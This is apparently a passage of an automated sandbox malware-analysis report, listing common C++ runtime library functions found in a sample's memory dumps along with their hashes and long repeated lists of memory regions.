                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3010677857-0
                                                                                                                                                                                                                                          • Opcode ID: 49abb832542600c08338a52b183585b97a2d08aefa2c782530a78c6f26785b76
                                                                                                                                                                                                                                          • Instruction ID: aa1a328d524611cdb616a8d7dde6f187e0fb61491f0365426c94c376ed0560fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49abb832542600c08338a52b183585b97a2d08aefa2c782530a78c6f26785b76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83817EF0A11B62BAD748EF748445BD9FBA9BF09700F10421EF52897281DBB4A660CBD5
                                                                                                                                                                                                                                          Function 006AECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 006AECED
                                                                                                                                                                                                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 006AED17
                                                                                                                                                                                                                                            • Part of subcall function 006AF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 006AF3FA
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006AED53
                                                                                                                                                                                                                                          • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 006AED94
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 006AEDC6
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006AEDEC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1319684358-0
                                                                                                                                                                                                                                          • Opcode ID: 8c616796b3954904296038db12ff8d3602f22b14b9f4e6271fefe8b7eb44d81b
                                                                                                                                                                                                                                          • Instruction ID: 4d764e5c48324f0c5b1191037f73d3098c1389f8d4bf2d86146803e79e1cbc4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c616796b3954904296038db12ff8d3602f22b14b9f4e6271fefe8b7eb44d81b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E316D71E002058BDB15FFA8C9416EEB7F6AF4A310B24406EE445E7351DB759E028F95
                                                                                                                                                                                                                                          Function 006CCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID: vl
                                                                                                                                                                                                                                          • API String ID: 3213747228-3645925279
                                                                                                                                                                                                                                          • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction ID: bf3f50399607ca427c2d8a53b31435ac0948c388bf40e27d1b47b3f6881d54bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7B103329046459FDB11CF68C841FFEBBA6EF4A360F1441AEE859DB341D6349D42CBA4
                                                                                                                                                                                                                                          Function 006C1B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 006C1B57
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C1B66
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C1C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                                                                                                                          • String ID: pContext$switchState
                                                                                                                                                                                                                                          • API String ID: 2656283622-2660820399
                                                                                                                                                                                                                                          • Opcode ID: 8a897c565e5d806abb3cb20c84800010b846a0c923153de145e2d723b40b1bf3
                                                                                                                                                                                                                                          • Instruction ID: acdf9818a8ae802395152e91049243edacface1cee6b0af33b0f966a46bdc3eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a897c565e5d806abb3cb20c84800010b846a0c923153de145e2d723b40b1bf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2318F35A00214ABCB04EB64C895EBDB3B7EF47310F21856DE9119B392EB75EE01CA94
                                                                                                                                                                                                                                          Function 006C4E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 006C4E6D
                                                                                                                                                                                                                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 006C4E86
                                                                                                                                                                                                                                          • PMDtoOffset.LIBCMT ref: 006C4EAC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
